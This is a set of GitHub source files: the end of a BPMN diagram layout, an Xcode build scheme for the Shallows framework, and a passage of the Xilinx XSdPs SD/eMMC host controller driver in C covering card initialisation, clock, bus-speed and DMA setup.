<bpmndi:BPMNPlane id="BPMNPlane_1" bpmnElement="Process_1">
<bpmndi:BPMNShape id="_BPMNShape_StartEvent_2" bpmnElement="StartEvent_1">
<dc:Bounds x="111" y="230" width="36" height="36" />
<bpmndi:BPMNLabel>
<dc:Bounds x="84" y="266" width="90" height="20" />
</bpmndi:BPMNLabel>
</bpmndi:BPMNShape>
<bpmndi:BPMNEdge id="SequenceFlow_0j6tsnn_di" bpmnElement="SequenceFlow_0j6tsnn">
<di:waypoint xsi:type="dc:Point" x="147" y="248" />
<di:waypoint xsi:type="dc:Point" x="203" y="248" />
<bpmndi:BPMNLabel>
<dc:Bounds x="175" y="227" width="0" height="12" />
</bpmndi:BPMNLabel>
</bpmndi:BPMNEdge>
<bpmndi:BPMNShape id="ServiceTask_0c3g2sx_di" bpmnElement="Task_1b1r7ow">
<dc:Bounds x="203" y="208" width="100" height="80" />
</bpmndi:BPMNShape>
<bpmndi:BPMNEdge id="SequenceFlow_0baemzs_di" bpmnElement="SequenceFlow_0baemzs">
<di:waypoint xsi:type="dc:Point" x="303" y="248" />
<di:waypoint xsi:type="dc:Point" x="342" y="248" />
<bpmndi:BPMNLabel>
<dc:Bounds x="322.5" y="227" width="0" height="12" />
</bpmndi:BPMNLabel>
</bpmndi:BPMNEdge>
<bpmndi:BPMNShape id="ServiceTask_0k2efs8_di" bpmnElement="Task_162x79i">
<dc:Bounds x="481" y="208" width="100" height="80" />
</bpmndi:BPMNShape>
<bpmndi:BPMNShape id="EndEvent_042s0oc_di" bpmnElement="EndEvent_042s0oc">
<dc:Bounds x="635" y="230" width="36" height="36" />
<bpmndi:BPMNLabel>
<dc:Bounds x="653" y="270" width="0" height="12" />
</bpmndi:BPMNLabel>
</bpmndi:BPMNShape>
<bpmndi:BPMNEdge id="SequenceFlow_19klrd3_di" bpmnElement="SequenceFlow_19klrd3">
<di:waypoint xsi:type="dc:Point" x="581" y="248" />
<di:waypoint xsi:type="dc:Point" x="635" y="248" />
<bpmndi:BPMNLabel>
<dc:Bounds x="608" y="227" width="0" height="12" />
</bpmndi:BPMNLabel>
</bpmndi:BPMNEdge>
<bpmndi:BPMNEdge id="SequenceFlow_0cu1bs2_di" bpmnElement="SequenceFlow_0cu1bs2">
<di:waypoint xsi:type="dc:Point" x="442" y="248" />
<di:waypoint xsi:type="dc:Point" x="481" y="248" />
<bpmndi:BPMNLabel>
<dc:Bounds x="461.5" y="227" width="0" height="12" />
</bpmndi:BPMNLabel>
</bpmndi:BPMNEdge>
<bpmndi:BPMNShape id="ServiceTask_1mvu7vz_di" bpmnElement="Task_1t0a4uy">
<dc:Bounds x="342" y="208" width="100" height="80" />
</bpmndi:BPMNShape>
</bpmndi:BPMNPlane>
</bpmndi:BPMNDiagram>
</bpmn:definitions>
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<Scheme
LastUpgradeVersion = "0900"
version = "1.3">
<BuildAction
parallelizeBuildables = "YES"
buildImplicitDependencies = "YES">
<BuildActionEntries>
<BuildActionEntry
buildForTesting = "YES"
buildForRunning = "YES"
buildForProfiling = "YES"
buildForArchiving = "YES"
buildForAnalyzing = "YES">
<BuildableReference
BuildableIdentifier = "primary"
BlueprintIdentifier = "52D6D97B1BEFF229002C0205"
BuildableName = "Shallows.framework"
BlueprintName = "Shallows-iOS"
ReferencedContainer = "container:Shallows.xcodeproj">
</BuildableReference>
</BuildActionEntry>
</BuildActionEntries>
</BuildAction>
<TestAction
buildConfiguration = "Debug"
selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB"
selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB"
language = ""
shouldUseLaunchSchemeArgsEnv = "YES"
codeCoverageEnabled = "YES">
<Testables>
<TestableReference
skipped = "NO">
<BuildableReference
BuildableIdentifier = "primary"
BlueprintIdentifier = "52D6D9851BEFF229002C0205"
BuildableName = "Shallows-iOS Tests.xctest"
BlueprintName = "Shallows-iOS Tests"
ReferencedContainer = "container:Shallows.xcodeproj">
</BuildableReference>
</TestableReference>
</Testables>
<MacroExpansion>
<BuildableReference
BuildableIdentifier = "primary"
BlueprintIdentifier = "52D6D97B1BEFF229002C0205"
BuildableName = "Shallows.framework"
BlueprintName = "Shallows-iOS"
ReferencedContainer = "container:Shallows.xcodeproj">
</BuildableReference>
</MacroExpansion>
<AdditionalOptions>
</AdditionalOptions>
</TestAction>
<LaunchAction
buildConfiguration = "Debug"
selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB"
selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB"
language = ""
launchStyle = "0"
useCustomWorkingDirectory = "NO"
ignoresPersistentStateOnLaunch = "NO"
debugDocumentVersioning = "YES"
debugServiceExtension = "internal"
allowLocationSimulation = "YES">
<MacroExpansion>
<BuildableReference
BuildableIdentifier = "primary"
BlueprintIdentifier = "52D6D97B1BEFF229002C0205"
BuildableName = "Shallows.framework"
BlueprintName = "Shallows-iOS"
ReferencedContainer = "container:Shallows.xcodeproj">
</BuildableReference>
</MacroExpansion>
<AdditionalOptions>
</AdditionalOptions>
</LaunchAction>
<ProfileAction
buildConfiguration = "Release"
shouldUseLaunchSchemeArgsEnv = "YES"
savedToolIdentifier = ""
useCustomWorkingDirectory = "NO"
debugDocumentVersioning = "YES">
<MacroExpansion>
<BuildableReference
BuildableIdentifier = "primary"
BlueprintIdentifier = "52D6D97B1BEFF229002C0205"
BuildableName = "Shallows.framework"
BlueprintName = "Shallows-iOS"
ReferencedContainer = "container:Shallows.xcodeproj">
</BuildableReference>
</MacroExpansion>
</ProfileAction>
<AnalyzeAction
buildConfiguration = "Debug">
</AnalyzeAction>
<ArchiveAction
buildConfiguration = "Release"
revealArchiveInOrganizer = "YES">
</ArchiveAction>
</Scheme>
| {
"pile_set_name": "Github"
} |
/******************************************************************************
* Copyright (C) 2013 - 2020 Xilinx, Inc. All rights reserved.
* SPDX-License-Identifier: MIT
******************************************************************************/
/*****************************************************************************/
/**
*
* @file xsdps_host.c
* @addtogroup sdps_v3_9
* @{
*
* Contains the interface functions of the XSdPs driver.
* See xsdps.h for a detailed description of the device and driver.
*
* <pre>
* MODIFICATION HISTORY:
*
* Ver Who Date Changes
* ----- --- -------- -----------------------------------------------
* 3.9 mn 03/03/20 Restructured the code for more readability and modularity
* mn 03/16/20 Add code to get card ID for MMC/eMMC
*
* </pre>
*
******************************************************************************/
/***************************** Include Files *********************************/
#include "xsdps_core.h"
/************************** Constant Definitions *****************************/
/**************************** Type Definitions *******************************/
/***************** Macros (Inline Functions) Definitions *********************/
/************************** Function Prototypes ******************************/
#if EL1_NONSECURE && defined (__aarch64__)
void XSdps_Smc(XSdPs *InstancePtr, u32 RegOffset, u32 Mask, u32 Val)
{
(void)Xil_Smc(MMIO_WRITE_SMC_FID, (u64)(InstancePtr->SlcrBaseAddr +
RegOffset) | ((u64)Mask << 32),
(u64)Val, 0, 0, 0, 0, 0);
}
#endif
/*****************************************************************************/
/**
*
* @brief
* Switches the SD card voltage from 3v3 to 1v8
*
*
* @param InstancePtr is a pointer to the XSdPs instance.
*
******************************************************************************/
s32 XSdPs_Switch_Voltage(XSdPs *InstancePtr)
{
s32 Status;
/* Setup the voltage switching sequence */
Status = XSdPs_SetupVoltageSwitch(InstancePtr);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
/* Set the card voltage to 1.8V */
Status = XSdPs_CardSetVoltage18(InstancePtr);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
/* Check if the bus is high */
Status = XSdPs_CheckBusHigh(InstancePtr);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
}
RETURN_PATH:
return Status;
}
/*****************************************************************************/
/**
* @brief
* This function initiates the transfer to or from SD card.
*
* @param InstancePtr is a pointer to the instance to be worked on.
*
* @return
* - XST_SUCCESS if initialization was successful
* - XST_FAILURE if failure
*
******************************************************************************/
s32 XSdPs_SetupTransfer(XSdPs *InstancePtr)
{
u32 PresentStateReg;
s32 Status;
if ((InstancePtr->HC_Version != XSDPS_HC_SPEC_V3) ||
((InstancePtr->Host_Caps & XSDPS_CAPS_SLOT_TYPE_MASK)
!= XSDPS_CAPS_EMB_SLOT)) {
if(InstancePtr->Config.CardDetect != 0U) {
/* Check status to ensure card is initialized */
PresentStateReg = XSdPs_ReadReg(InstancePtr->Config.BaseAddress,
XSDPS_PRES_STATE_OFFSET);
if ((PresentStateReg & XSDPS_PSR_CARD_INSRT_MASK) == 0x0U) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
}
}
/* Set block size to 512 if not already set */
if(XSdPs_ReadReg(InstancePtr->Config.BaseAddress,
XSDPS_BLK_SIZE_OFFSET) != XSDPS_BLK_SIZE_512_MASK ) {
Status = XSdPs_SetBlkSize(InstancePtr,
XSDPS_BLK_SIZE_512_MASK);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
}
Status = XST_SUCCESS;
RETURN_PATH:
return Status;
}
/*****************************************************************************/
/**
* @brief
* This function resets the SD card.
*
* @param InstancePtr is a pointer to the instance to be worked on.
* @param Value is the type of reset
*
* @return
* - XST_SUCCESS if initialization was successful
* - XST_FAILURE if failure
*
******************************************************************************/
s32 XSdPs_Reset(XSdPs *InstancePtr, u8 Value)
{
s32 Status;
/* "Software reset for all" is initiated */
XSdPs_WriteReg8(InstancePtr->Config.BaseAddress, XSDPS_SW_RST_OFFSET,
Value);
Status = XSdPs_CheckResetDone(InstancePtr, Value);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH ;
}
RETURN_PATH:
return Status;
}
/*****************************************************************************/
/**
* @brief
* This function sets bit to start execution of tuning.
*
* @param InstancePtr is a pointer to the instance to be worked on.
*
* @return None
*
******************************************************************************/
void XSdPs_SetExecTuning(XSdPs *InstancePtr)
{
u16 CtrlReg;
CtrlReg = XSdPs_ReadReg16(InstancePtr->Config.BaseAddress,
XSDPS_HOST_CTRL2_OFFSET);
CtrlReg |= XSDPS_HC2_EXEC_TNG_MASK;
XSdPs_WriteReg16(InstancePtr->Config.BaseAddress,
XSDPS_HOST_CTRL2_OFFSET, CtrlReg);
}
/*****************************************************************************/
/**
* @brief
* This function does SD mode initialization.
*
* @param InstancePtr is a pointer to the instance to be worked on.
*
* @return
* - XST_SUCCESS if initialization is successful
* - XST_FAILURE if failure
*
******************************************************************************/
s32 XSdPs_SdModeInit(XSdPs *InstancePtr)
{
s32 Status;
#ifdef __ICCARM__
#pragma data_alignment = 32
static u8 SCR[8] = { 0U };
#else
static u8 SCR[8] __attribute__ ((aligned(32))) = { 0U };
#endif
u8 ReadBuff[64] = { 0U };
Status = XSdPs_Get_BusWidth(InstancePtr, SCR);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
if ((SCR[1] & WIDTH_4_BIT_SUPPORT) != 0U) {
InstancePtr->BusWidth = XSDPS_4_BIT_WIDTH;
Status = XSdPs_Change_BusWidth(InstancePtr);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
}
/* Get speed supported by device */
Status = XSdPs_Get_BusSpeed(InstancePtr, ReadBuff);
if (Status != XST_SUCCESS) {
goto RETURN_PATH;
}
if (((SCR[2] & SCR_SPEC_VER_3) != 0U) &&
(ReadBuff[13] >= UHS_SDR50_SUPPORT) &&
(InstancePtr->Config.BusWidth == XSDPS_WIDTH_8) &&
(InstancePtr->Switch1v8 == 0U)) {
InstancePtr->Switch1v8 = 1U;
Status = XSdPs_CardSetVoltage18(InstancePtr);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
}
if (InstancePtr->Switch1v8 != 0U) {
/* Identify the UHS mode supported by card */
XSdPs_Identify_UhsMode(InstancePtr, ReadBuff);
Status = XSdPs_Change_BusSpeed(InstancePtr);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
} else {
/*
* card supports CMD6 when SD_SPEC field in SCR register
* indicates that the Physical Layer Specification Version
* is 1.10 or later. So for SD v1.0 cmd6 is not supported.
*/
if (SCR[0] != 0U) {
/* Check for high speed support */
if (((ReadBuff[13] & HIGH_SPEED_SUPPORT) != 0U) &&
(InstancePtr->BusWidth >= XSDPS_4_BIT_WIDTH)) {
InstancePtr->Mode = XSDPS_HIGH_SPEED_MODE;
InstancePtr->OTapDelay = SD_OTAPDLYSEL_SD_HSD;
InstancePtr->ITapDelay = SD_ITAPDLYSEL_HSD;
Status = XSdPs_Change_BusSpeed(InstancePtr);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
}
}
}
Status = XSdPs_SetBlkSize(InstancePtr, XSDPS_BLK_SIZE_512_MASK);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
Status = XST_SUCCESS;
RETURN_PATH:
return Status;
}
/*****************************************************************************/
/**
* @brief
* This function does MMC mode initialization.
*
* @param InstancePtr is a pointer to the instance to be worked on.
*
* @return
* - XST_SUCCESS if initialization is successful
* - XST_FAILURE if failure
*
******************************************************************************/
s32 XSdPs_MmcModeInit(XSdPs *InstancePtr)
{
s32 Status;
#ifdef __ICCARM__
#pragma data_alignment = 32
static u8 ExtCsd[512];
#else
static u8 ExtCsd[512] __attribute__ ((aligned(32)));
#endif
InstancePtr->BusWidth = XSDPS_4_BIT_WIDTH;
Status = XSdPs_Change_BusWidth(InstancePtr);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
Status = XSdPs_Get_Mmc_ExtCsd(InstancePtr, ExtCsd);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
InstancePtr->SectorCount = ((u32)ExtCsd[EXT_CSD_SEC_COUNT_BYTE4]) << 24;
InstancePtr->SectorCount |= (u32)ExtCsd[EXT_CSD_SEC_COUNT_BYTE3] << 16;
InstancePtr->SectorCount |= (u32)ExtCsd[EXT_CSD_SEC_COUNT_BYTE2] << 8;
InstancePtr->SectorCount |= (u32)ExtCsd[EXT_CSD_SEC_COUNT_BYTE1];
if (((ExtCsd[EXT_CSD_DEVICE_TYPE_BYTE] &
EXT_CSD_DEVICE_TYPE_HIGH_SPEED) != 0U) &&
(InstancePtr->BusWidth >= XSDPS_4_BIT_WIDTH)) {
InstancePtr->Mode = XSDPS_HIGH_SPEED_MODE;
Status = XSdPs_Change_BusSpeed(InstancePtr);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
Status = XSdPs_Get_Mmc_ExtCsd(InstancePtr, ExtCsd);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
if (ExtCsd[EXT_CSD_HS_TIMING_BYTE] != EXT_CSD_HS_TIMING_HIGH) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
}
Status = XST_SUCCESS;
RETURN_PATH:
return Status;
}
/*****************************************************************************/
/**
* @brief
* This function does eMMC mode initialization.
*
* @param InstancePtr is a pointer to the instance to be worked on.
*
* @return
* - XST_SUCCESS if initialization is successful
* - XST_FAILURE if failure
*
******************************************************************************/
s32 XSdPs_EmmcModeInit(XSdPs *InstancePtr)
{
s32 Status;
#ifdef __ICCARM__
#pragma data_alignment = 32
static u8 ExtCsd[512];
#else
static u8 ExtCsd[512] __attribute__ ((aligned(32)));
#endif
if ((InstancePtr->HC_Version == XSDPS_HC_SPEC_V3) &&
(InstancePtr->Config.BusWidth == XSDPS_WIDTH_8)) {
/* in case of eMMC data width 8-bit */
InstancePtr->BusWidth = XSDPS_8_BIT_WIDTH;
} else if (InstancePtr->Config.BusWidth == XSDPS_WIDTH_4) {
/* in case of eMMC data width 4-bit */
InstancePtr->BusWidth = XSDPS_4_BIT_WIDTH;
} else {
/* in case of eMMC data width 1-bit */
InstancePtr->BusWidth = XSDPS_1_BIT_WIDTH;
}
Status = XSdPs_Change_BusWidth(InstancePtr);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
/* Get Extended CSD */
Status = XSdPs_Get_Mmc_ExtCsd(InstancePtr, ExtCsd);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
InstancePtr->SectorCount = ((u32)ExtCsd[EXT_CSD_SEC_COUNT_BYTE4]) << 24;
InstancePtr->SectorCount |= (u32)ExtCsd[EXT_CSD_SEC_COUNT_BYTE3] << 16;
InstancePtr->SectorCount |= (u32)ExtCsd[EXT_CSD_SEC_COUNT_BYTE2] << 8;
InstancePtr->SectorCount |= (u32)ExtCsd[EXT_CSD_SEC_COUNT_BYTE1];
XSdPs_IdentifyEmmcMode(InstancePtr, ExtCsd);
if (InstancePtr->Mode != XSDPS_DEFAULT_SPEED_MODE) {
Status = XSdPs_Change_BusSpeed(InstancePtr);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
Status = XSdPs_CheckEmmcTiming(InstancePtr, ExtCsd);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
}
/* Enable Rst_n_Fun bit if it is disabled */
if(ExtCsd[EXT_CSD_RST_N_FUN_BYTE] == EXT_CSD_RST_N_FUN_TEMP_DIS) {
Status = XSdPs_Set_Mmc_ExtCsd(InstancePtr, XSDPS_MMC_RST_FUN_EN_ARG);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
}
Status = XST_SUCCESS;
RETURN_PATH:
return Status;
}
/*****************************************************************************/
/**
* @brief
* This function disables the bus power.
*
* @param InstancePtr is a pointer to the instance to be worked on.
*
* @return None
*
******************************************************************************/
void XSdPs_DisableBusPower(XSdPs *InstancePtr)
{
/* Disable SD bus power and issue eMMC HW reset */
if (InstancePtr->HC_Version == XSDPS_HC_SPEC_V3) {
XSdPs_WriteReg8(InstancePtr->Config.BaseAddress,
XSDPS_POWER_CTRL_OFFSET, XSDPS_PC_EMMC_HW_RST_MASK);
} else {
XSdPs_WriteReg8(InstancePtr->Config.BaseAddress,
XSDPS_POWER_CTRL_OFFSET, 0x0);
}
/* 1ms delay to poweroff card */
(void)usleep(1000U);
}
/*****************************************************************************/
/**
* @brief
* This function enables the bus power.
*
* @param InstancePtr is a pointer to the instance to be worked on.
*
* @return None
*
******************************************************************************/
void XSdPs_EnableBusPower(XSdPs *InstancePtr)
{
/* Select voltage and enable bus power. */
if (InstancePtr->HC_Version == XSDPS_HC_SPEC_V3) {
XSdPs_WriteReg8(InstancePtr->Config.BaseAddress,
XSDPS_POWER_CTRL_OFFSET,
(XSDPS_PC_BUS_VSEL_3V3_MASK | XSDPS_PC_BUS_PWR_MASK) &
~XSDPS_PC_EMMC_HW_RST_MASK);
} else {
XSdPs_WriteReg8(InstancePtr->Config.BaseAddress,
XSDPS_POWER_CTRL_OFFSET,
XSDPS_PC_BUS_VSEL_3V3_MASK | XSDPS_PC_BUS_PWR_MASK);
}
/* 0.2ms Delay after bus power on*/
usleep(200);
}
/*****************************************************************************/
/**
* @brief
* This function enumerates the SD card.
*
* @param InstancePtr is a pointer to the instance to be worked on.
*
* @return None
*
******************************************************************************/
s32 XSdPs_SdCardEnum(XSdPs *InstancePtr)
{
s32 Status;
/* Check if the card is present */
Status = XSdPs_CheckCardDetect(InstancePtr);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
/* Reset the SD card */
Status = XSdPs_CardReset(InstancePtr);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
/* Get the card interface condition */
Status = XSdPs_CardIfCond(InstancePtr);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
/* Get the card operating condition */
Status = XSdPs_CardOpCond(InstancePtr);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
/* Get the card ID */
Status = XSdPs_GetCardId(InstancePtr);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
/* Get the CSD register */
Status = XSdPs_GetCsd(InstancePtr);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
/* Change clock to default clock 25MHz */
/*
* SD default speed mode timing should be closed at 19 MHz.
* The reason for this is SD requires a voltage level shifter.
* This limitation applies to ZynqMPSoC.
*/
if (InstancePtr->HC_Version == XSDPS_HC_SPEC_V3) {
InstancePtr->BusSpeed = SD_CLK_19_MHZ;
} else {
InstancePtr->BusSpeed = SD_CLK_25_MHZ;
}
Status = XSdPs_Change_ClkFreq(InstancePtr, InstancePtr->BusSpeed);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
/* Select the card to transition to transfer state */
Status = XSdPs_Select_Card(InstancePtr);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
/* Pull-up disconnected during data transfer */
Status = XSdPs_Pullup(InstancePtr);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
Status = XST_SUCCESS;
RETURN_PATH:
return Status;
}
/*****************************************************************************/
/**
* @brief
* This function enumerates the MMC card.
*
* @param InstancePtr is a pointer to the instance to be worked on.
*
* @return None
*
******************************************************************************/
s32 XSdPs_MmcCardEnum(XSdPs *InstancePtr)
{
s32 Status;
/* Check if the card is preset */
Status = XSdPs_CheckCardDetect(InstancePtr);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
/* Reset the card */
Status = XSdPs_CardReset(InstancePtr);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
/* Get the card operating condition */
Status = XSdPs_CardOpCond(InstancePtr);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
/* Get the card ID */
Status = XSdPs_GetCardId(InstancePtr);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
/* Get the CSD register */
Status = XSdPs_GetCsd(InstancePtr);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
/* Change clock to default clock 26MHz */
InstancePtr->BusSpeed = SD_CLK_26_MHZ;
Status = XSdPs_Change_ClkFreq(InstancePtr, InstancePtr->BusSpeed);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
/* Send select card command to transition to transfer state */
Status = XSdPs_Select_Card(InstancePtr);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
Status = XST_SUCCESS;
RETURN_PATH:
return Status;
}
/*****************************************************************************/
/**
* @brief
* This function performs SD tuning.
*
* @param InstancePtr is a pointer to the instance to be worked on.
*
* @return None
*
******************************************************************************/
s32 XSdPs_Execute_Tuning(XSdPs *InstancePtr)
{
s32 Status;
#ifndef versal
/* Issue DLL Reset to load new SDHC tuned tap values */
Status = XSdPs_DllReset(InstancePtr);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
#endif
/* Perform the auto tuning */
Status = XSdPs_AutoTuning(InstancePtr);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
#ifndef versal
/* Issue DLL Reset to load new SDHC tuned tap values */
Status = XSdPs_DllReset(InstancePtr);
if (Status != XST_SUCCESS) {
Status = XST_FAILURE;
goto RETURN_PATH;
}
#endif
Status = XST_SUCCESS;
RETURN_PATH:
return Status;
}
/*****************************************************************************/
/**
* @brief
* This function is used to enable the clock.
*
* @param InstancePtr is a pointer to the instance to be worked on.
* @param ClockReg is the clock value to be set.
*
* @return
* - XST_SUCCESS if success
* - XST_FAILURE if failure
*
******************************************************************************/
s32 XSdPs_EnableClock(XSdPs *InstancePtr, u16 ClockReg)
{
u32 Timeout = 150000U;
s32 Status;
u16 ReadReg;
ClockReg |= (u16)XSDPS_CC_INT_CLK_EN_MASK;
XSdPs_WriteReg16(InstancePtr->Config.BaseAddress,
XSDPS_CLK_CTRL_OFFSET, ClockReg);
/* Wait for 150ms for internal clock to stabilize */
do {
ReadReg = XSdPs_ReadReg16(InstancePtr->Config.BaseAddress,
XSDPS_CLK_CTRL_OFFSET);
Timeout = Timeout - 1U;
usleep(1);
} while (((ReadReg & XSDPS_CC_INT_CLK_STABLE_MASK) == 0U)
&& (Timeout != 0U));
if (Timeout == 0U) {
Status = XST_FAILURE;
goto RETURN_PATH ;
}
/* Enable SD clock */
ClockReg |= XSDPS_CC_SD_CLK_EN_MASK;
XSdPs_WriteReg16(InstancePtr->Config.BaseAddress,
XSDPS_CLK_CTRL_OFFSET, ClockReg);
Status = XST_SUCCESS;
RETURN_PATH:
return Status;
}
/*****************************************************************************/
/**
* @brief
* This function is used to calculate the bus speed.
*
* @param InstancePtr is a pointer to the instance to be worked on.
* @param Arg is the argument to be sent along with the command.
* This could be address or any other information
*
* @return
* - XST_SUCCESS if success
* - XST_FAILURE if failure
*
******************************************************************************/
s32 XSdPs_CalcBusSpeed(XSdPs *InstancePtr, u32 *Arg)
{
s32 Status = XST_SUCCESS;
if (InstancePtr->CardType == XSDPS_CARD_SD) {
switch (InstancePtr->Mode) {
case XSDPS_UHS_SPEED_MODE_SDR12:
*Arg = XSDPS_SWITCH_CMD_SDR12_SET;
InstancePtr->BusSpeed = XSDPS_SD_SDR12_MAX_CLK;
break;
case XSDPS_UHS_SPEED_MODE_SDR25:
*Arg = XSDPS_SWITCH_CMD_SDR25_SET;
InstancePtr->BusSpeed = XSDPS_SD_SDR25_MAX_CLK;
break;
case XSDPS_UHS_SPEED_MODE_SDR50:
*Arg = XSDPS_SWITCH_CMD_SDR50_SET;
InstancePtr->BusSpeed = XSDPS_SD_SDR50_MAX_CLK;
break;
case XSDPS_UHS_SPEED_MODE_SDR104:
*Arg = XSDPS_SWITCH_CMD_SDR104_SET;
InstancePtr->BusSpeed = XSDPS_SD_SDR104_MAX_CLK;
break;
case XSDPS_UHS_SPEED_MODE_DDR50:
*Arg = XSDPS_SWITCH_CMD_DDR50_SET;
InstancePtr->BusSpeed = XSDPS_SD_DDR50_MAX_CLK;
break;
case XSDPS_HIGH_SPEED_MODE:
*Arg = XSDPS_SWITCH_CMD_HS_SET;
InstancePtr->BusSpeed = XSDPS_CLK_50_MHZ;
break;
default:
Status = XST_FAILURE;
break;
}
} else {
switch (InstancePtr->Mode) {
case XSDPS_HS200_MODE:
*Arg = XSDPS_MMC_HS200_ARG;
InstancePtr->BusSpeed = XSDPS_MMC_HS200_MAX_CLK;
break;
case XSDPS_DDR52_MODE:
*Arg = XSDPS_MMC_HIGH_SPEED_ARG;
InstancePtr->BusSpeed = XSDPS_MMC_DDR_MAX_CLK;
break;
case XSDPS_HIGH_SPEED_MODE:
*Arg = XSDPS_MMC_HIGH_SPEED_ARG;
InstancePtr->BusSpeed = XSDPS_MMC_HSD_MAX_CLK;
break;
default:
Status = XST_FAILURE;
break;
}
}
return Status;
}
/*****************************************************************************/
/**
* @brief
* This function is used to do the DMA transfer to or from SD card.
*
* @param InstancePtr is a pointer to the instance to be worked on.
* @param BlkCnt - Block count passed by the user.
* @param BlkSize - Block size passed by the user.
* @param Buff - Pointer to the data buffer for a DMA transfer.
*
* @return
* - XST_SUCCESS if initialization was successful
* - XST_FAILURE if failure - could be because another transfer
* is in progress or command or data inhibit is set
*
******************************************************************************/
void XSdPs_SetupReadDma(XSdPs *InstancePtr, u16 BlkCnt, u16 BlkSize, u8 *Buff)
{
BlkSize &= XSDPS_BLK_SIZE_MASK;
XSdPs_WriteReg16(InstancePtr->Config.BaseAddress,
XSDPS_BLK_SIZE_OFFSET, BlkSize);
if (InstancePtr->Dma64BitAddr >= ADDRESS_BEYOND_32BIT) {
XSdPs_SetupADMA2DescTbl64Bit(InstancePtr, BlkCnt);
} else {
XSdPs_SetupADMA2DescTbl(InstancePtr, BlkCnt, Buff);
if (InstancePtr->Config.IsCacheCoherent == 0U) {
Xil_DCacheInvalidateRange((INTPTR)Buff,
(INTPTR)BlkCnt * BlkSize);
}
}
if (BlkCnt == 1U) {
InstancePtr->TransferMode = XSDPS_TM_BLK_CNT_EN_MASK |
XSDPS_TM_DAT_DIR_SEL_MASK | XSDPS_TM_DMA_EN_MASK;
} else {
InstancePtr->TransferMode = XSDPS_TM_AUTO_CMD12_EN_MASK |
XSDPS_TM_BLK_CNT_EN_MASK | XSDPS_TM_DAT_DIR_SEL_MASK |
XSDPS_TM_DMA_EN_MASK | XSDPS_TM_MUL_SIN_BLK_SEL_MASK;
}
}
/*****************************************************************************/
/**
* @brief
* This function is used to do the DMA transfer to or from SD card.
*
* @param InstancePtr is a pointer to the instance to be worked on.
* @param BlkCnt - Block count passed by the user.
* @param BlkSize - Block size passed by the user.
* @param Buff - Pointer to the data buffer for a DMA transfer.
*
* @return
* - XST_SUCCESS if initialization was successful
* - XST_FAILURE if failure - could be because another transfer
* is in progress or command or data inhibit is set
*
******************************************************************************/
void XSdPs_SetupWriteDma(XSdPs *InstancePtr, u16 BlkCnt, u16 BlkSize, const u8 *Buff)
{
BlkSize &= XSDPS_BLK_SIZE_MASK;
XSdPs_WriteReg16(InstancePtr->Config.BaseAddress,
XSDPS_BLK_SIZE_OFFSET, BlkSize);
if (InstancePtr->Dma64BitAddr >= ADDRESS_BEYOND_32BIT) {
XSdPs_SetupADMA2DescTbl64Bit(InstancePtr, BlkCnt);
} else {
XSdPs_SetupADMA2DescTbl(InstancePtr, BlkCnt, Buff);
if (InstancePtr->Config.IsCacheCoherent == 0U) {
Xil_DCacheFlushRange((INTPTR)Buff,
(INTPTR)BlkCnt * BlkSize);
